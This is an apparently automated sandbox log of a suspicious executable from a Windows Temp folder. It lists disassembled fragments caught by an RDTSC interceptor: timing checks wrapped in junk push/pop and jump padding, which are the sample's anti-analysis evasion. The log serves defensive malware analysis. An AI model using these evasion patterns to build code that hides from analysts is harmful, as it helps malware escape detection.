                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C105A second address: 8C105F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C105F second address: 8C1065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C1065 second address: 8C1080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81D0C8437h 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C1080 second address: 8C1084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8CC304 second address: 8CC308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8D0028 second address: 8D002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8D4504 second address: 8D4508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8D40D1 second address: 8D40D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8D40D7 second address: 8D40DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8E45E9 second address: 8E45F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD81C888256h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8E45F9 second address: 8E4642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD81D0C8426h 0x0000000a je 00007FD81D0C8426h 0x00000010 popad 0x00000011 jmp 00007FD81D0C8433h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jc 00007FD81D0C8426h 0x00000020 pushad 0x00000021 popad 0x00000022 jns 00007FD81D0C8426h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD81D0C8430h 0x00000030 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8E4642 second address: 8E464E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD81C888256h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8E464E second address: 8E466D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C8439h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8E466D second address: 8E4677 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD81C888256h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 803A06 second address: 803A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ECA70 second address: 8ECA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ECA76 second address: 8ECA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ECBD6 second address: 8ECBEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FD81C888256h 0x0000000b pop eax 0x0000000c jc 00007FD81C88825Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ECD4A second address: 8ECD91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a jmp 00007FD81D0C842Ah 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FD81D0C8430h 0x00000017 jmp 00007FD81D0C842Dh 0x0000001c pushad 0x0000001d jmp 00007FD81D0C8430h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ED03B second address: 8ED04F instructions: 0x00000000 rdtsc 0x00000002 js 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FD81C888256h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ED04F second address: 8ED080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81D0C8433h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8EDF9C second address: 8EDFAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FD81C88825Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8F0FEE second address: 8F0FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8F0FF2 second address: 8F1022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD81C888256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FD81C888274h 0x00000012 jmp 00007FD81C888268h 0x00000017 je 00007FD81C888256h 0x0000001d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8F5D49 second address: 8F5D7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD81D0C8432h 0x0000000a jmp 00007FD81D0C8435h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8F5D7C second address: 8F5D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8FE322 second address: 8FE330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnp 00007FD81D0C8426h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 90E9E8 second address: 90E9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 911171 second address: 91119F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007FD81D0C8433h 0x0000000b js 00007FD81D0C8426h 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push esi 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 91119F second address: 9111A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 911328 second address: 91133D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD81D0C842Dh 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 91133D second address: 911341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 914BD4 second address: 914BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A29C second address: 92A2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A424 second address: 92A42A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A42A second address: 92A446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FD81C888256h 0x0000000d jne 00007FD81C888256h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A446 second address: 92A44A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A44A second address: 92A46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD81C88825Ch 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FD81C88825Eh 0x00000016 ja 00007FD81C888256h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A46F second address: 92A48B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C842Bh 0x00000008 jmp 00007FD81D0C842Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A765 second address: 92A769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A769 second address: 92A76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A9D0 second address: 92A9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A9D5 second address: 92A9EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD81D0C8432h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A9EC second address: 92A9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A9F4 second address: 92AA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92AA00 second address: 92AA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FD81C88825Dh 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92F633 second address: 92F63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92F63B second address: 92F65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81C88825Fh 0x00000009 push edi 0x0000000a pop edi 0x0000000b jns 00007FD81C888256h 0x00000011 popad 0x00000012 pop ecx 0x00000013 push edi 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 932065 second address: 93206A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 932245 second address: 932266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888265h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FD81C888256h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 9322F9 second address: 932303 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 932303 second address: 93230D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD81C888256h 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 93230D second address: 93232C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub dh, 0000001Fh 0x0000000c push 00000004h 0x0000000e mov dx, FA85h 0x00000012 push EE34E7E2h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB065B second address: 4BB066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB066A second address: 4BB0670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB0670 second address: 4BB0674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB0674 second address: 4BB068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD81D0C842Dh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BB068C second address: 4BB06C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FD81C888263h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FD81C88825Fh 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov di, ax 0x0000001a movzx ecx, di 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BB06C8 second address: 4BB06F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD81D0C8432h 0x0000000a jmp 00007FD81D0C8435h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70F0E second address: 4B70FAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD81C888266h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007FD81C888261h 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 pushfd 0x0000001a jmp 00007FD81C888267h 0x0000001f sub ch, 0000000Eh 0x00000022 jmp 00007FD81C888269h 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a jmp 00007FD81C88825Eh 0x0000002f mov ebp, esp 0x00000031 jmp 00007FD81C888260h 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c mov ax, di 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0885 second address: 4BC08D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD81D0C8437h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FD81D0C8436h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD81D0C8437h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B30BB2 second address: 4B30BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B30BB8 second address: 4B30BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B30BBC second address: 4B30BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B30BC0 second address: 4B30C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD81D0C842Fh 0x00000010 sbb al, FFFFFF9Eh 0x00000013 jmp 00007FD81D0C8439h 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b call 00007FD81D0C842Eh 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B30C08 second address: 4B30C38 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a jmp 00007FD81C88825Ah 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD81C888267h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B30C38 second address: 4B30C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f mov cx, B60Fh 0x00000013 popad 0x00000014 push dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD81D0C842Ch 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B30C73 second address: 4B30C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B30C77 second address: 4B30C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B30C7D second address: 4B30C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81C88825Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70BE6 second address: 4B70C07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FD81D0C842Bh 0x00000012 mov ebx, eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70C07 second address: 4B70C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70C0D second address: 4B70C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70C11 second address: 4B70C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD81C888269h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70C35 second address: 4B70C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
